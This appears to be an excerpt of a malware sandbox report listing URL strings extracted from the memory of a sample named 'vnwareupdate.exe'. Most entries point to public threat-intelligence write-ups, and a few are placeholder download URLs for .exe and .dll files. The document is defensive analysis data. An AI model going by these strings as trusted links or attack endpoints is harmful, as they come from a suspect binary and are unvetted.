Source: vnwareupdate.exe, 00000003.00000003.237953574.0000000003A27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-pape
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-pape//Operation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-pape089Operation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-pape1EOperation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-pape5bOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-pape6Operation
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-pape8
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeA
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeAmazon
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeAttacks
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeBraincrypt
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeNwOperation
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeOperation
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papePawn
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeSaOperation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeatOperation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papedOperation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papef6XSLCmd
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papegOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeiOperation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeioOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeion
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papepOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-paperOperation
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://www.trendmicro.de/media/wp/safe-a-targeted-threat-whitepaper-en.pdf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.vip80000.com/hot/index.html
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: http://www.virusradar.com/en/Python_Agent.F/description
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: http://www.vkremez.com/2017/09/lets-learn-reversing-trickbot-banking.html
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.vkremez.com/2017/09/lets-learn-reversing-trickbot-banking.htmlAnalyzing
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.vkremez.com/2017/09/lets-learn-reversing-trickbot-banking.htmlMuddying
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.vkremez.com/2017/09/lets-learn-reversing-trickbot-banking.html_Muddying
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://www.volexity.com/blog/?p=158
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://www.volexity.com/blog/?p=158Grabit
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://www.volexity.com/blog/?p=158Trojan.Win32.Banker.NWT
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.wasabii.com.tw
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: http://www.waseda.jp/navi/security/2017/0414.html
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.waseda.jp/navi/security/2017/0414.htmlCallisto
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.waseda.jp/navi/security/2017/0414.htmlSpearphishing
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.webroot.com/blog/2013/10/10/compromised-turkish-government-web-site-l
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.webroot.com/blog/2013/10/10/compromised-turkish-government-web-site-lAggressive
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.webroot.com/blog/2013/10/10/compromised-turkish-government-web-site-lCompromised
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.webroot.com/blog/2013/10/10/compromised-turkish-government-web-site-lb
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.webroot.com/blog/2013/10/10/compromised-turkish-government-web-site-lhnCompromised
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom.
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-customFancy
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-customNetTraveler
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-customSednit
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afgha
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afgha:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghaBingo
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghaoKorplug
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/01/29/msilagent-pyo-have-botnet-will-travel/
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/01/29/msilagent-pyo-have-botnet-will-travel/MSIL/Agent.PYO
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/01/29/msilagent-pyo-have-botnet-will-travel/Operation
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/04/09/operation-buhtrap/
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/04/09/operation-buhtrap/Operation
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/04/09/operation-buhtrap/ROKRAT
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/04/09/operation-buhtrap/The
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/04/29/unboxing-linuxmumblehard-muttering-spamHong
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/04/29/unboxing-linuxmumblehard-muttering-spamMumblehard
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/06/30/dino-spying-malware-analyzed/
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/06/30/dino-spying-malware-analyzed/Winnti
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/07/23/porn-clicker-keeps-infecting-apps-on-go
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-g
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-gCarbanak
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-gGazing
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/09/17/the-trojan-games-odlanor-malware-cheats
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/09/22/android-trojan-drops-in-despite-googles
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/10/20/multi-stage-exploit-installing-trojan/
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/10/20/multi-stage-exploit-installing-trojan/Multi-stage
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2015/10/20/multi-stage-exploit-installing-trojan/Wiper
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/01/20/new-wave-attacks-ukrainian-power-indust
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/01/20/new-wave-attacks-ukrainian-power-indust?
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/01/20/new-wave-attacks-ukrainian-power-industNew
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/01/20/new-wave-attacks-ukrainian-power-industTaiwan
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/07/01/espionage-toolkit-targeting-central-eas
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/07/01/espionage-toolkit-targeting-central-easVulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/07/12/nymaim-rides-2016-reaches-brazil/Regin
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/07/12/nymaim-rides-2016-reaches-brazil/lRegin
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmiss
Source: vnwareupdate.exe, 00000003.00000003.241963093.0000000005611000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/2016/10/20/new-eset-research-paper-puts-sednit-und
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Thr
Source: vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.p
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pLinux/Moose
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pMalicious
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressDrOperation
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressOperation
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Expressare
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressatOperation
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressinOperation
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressmpOperation
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressonOperation
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressooOperation
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressozOperation
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressspAnalysis
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-ExpressukOperation
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pd
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pd.
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pd.0
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pd.p
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdOperation
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdStantinko
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.wzpg.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.xcodez.com/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.xfocus.net
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.xfocus.org
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.xxx.com/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.xxx.com/xxx.exe
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://x.x.x/x.dll
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://zhouzhen.eviloctal.org
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://zhuiri.360.cn/report/index.php/2017/03/09/twotailedscorpion/
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://zhuiri.360.cn/report/index.php/2017/03/09/twotailedscorpion/(APT-C-23)
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: http://zhuiri.360.cn/report/index.php/2017/03/09/twotailedscorpion/Erebus
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://zhuiri.360.cn/report/index.php/2017/03/09/twotailedscorpion/MONSOON
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: http://zhuiri.360.cn/report/index.php/2017/03/09/twotailedscorpion/Petya
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://zhuiri.360.cn/report/index.php/2017/03/09/twotailedscorpion/SpyNote
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: http://zhuiri.360.cn/report/index.php/2017/03/09/twotailedscorpion/i(APT-C-23)
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://1.2.3.4:1234)
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://127.0.0.1:6655/cgi/redmin?op=cron&action=once
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://401trg.pw/an-update-on-winnti/
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://401trg.pw/an-update-on-winnti/An
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://401trg.pw/an-update-on-winnti/Fireeye:
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://401trg.pw/an-update-on-winnti/SlingShot
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://401trg.pw/burning-umbrella/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://adaclscan.codeplex.com/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://app.any.run/tasks/719c94eb-0a00-47cc-b583-ad4f9e25ebdb
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://app.any.run/tasks/ae2521dd-61aa-4bc7-b0d8-8c85ddcbfcc9
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/a2zw9uye2hhofsc1me6yfj39u6gjalcq
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/a2zw9uye2hhofsc1me6yfj39u6gjalcqDuke
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/a2zw9uye2hhofsc1me6yfj39u6gjalcqlInside
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/c95me2uocwoothfnapxrcjwfmynue4ri
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/gh8m5os2jewj2adleu2xqivj9qzf9ok8
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/gh8m5os2jewj2adleu2xqivj9qzf9ok8ENeutrino
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/gh8m5os2jewj2adleu2xqivj9qzf9ok8iRetefe
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/gh8m5os2jewj2adleu2xqivj9qzf9ok8mbot-APT.pdf
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/x2jgr4j1bgfas2h2b4h09mam9nn4qwu3
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/x2jgr4j1bgfas2h2b4h09mam9nn4qwu3APT1:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/x2jgr4j1bgfas2h2b4h09mam9nn4qwu3Group5:
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/x2jgr4j1bgfas2h2b4h09mam9nn4qwu3THE
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/xvilsesi5qd2gh6so2g3tnric51ndv57
Source: vnwareupdate.exe, 00000003.00000003.237233008.00000000036C1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/xvilsesi5qd2gh6so2g3tnric51ndv576BE21E389056CA028CF9083E42A765E8F61B0B5C;Crypt
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/xvilsesi5qd2gh6so2g3tnric51ndv57EvilBunny
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/xvilsesi5qd2gh6so2g3tnric51ndv57Footprints
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/xvilsesi5qd2gh6so2g3tnric51ndv57Pincav
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/xvilsesi5qd2gh6so2g3tnric51ndv57The
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://arsenalexperts.com/Case-Studies/Odatv/
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/an-update-on-the-urlzone-banker/
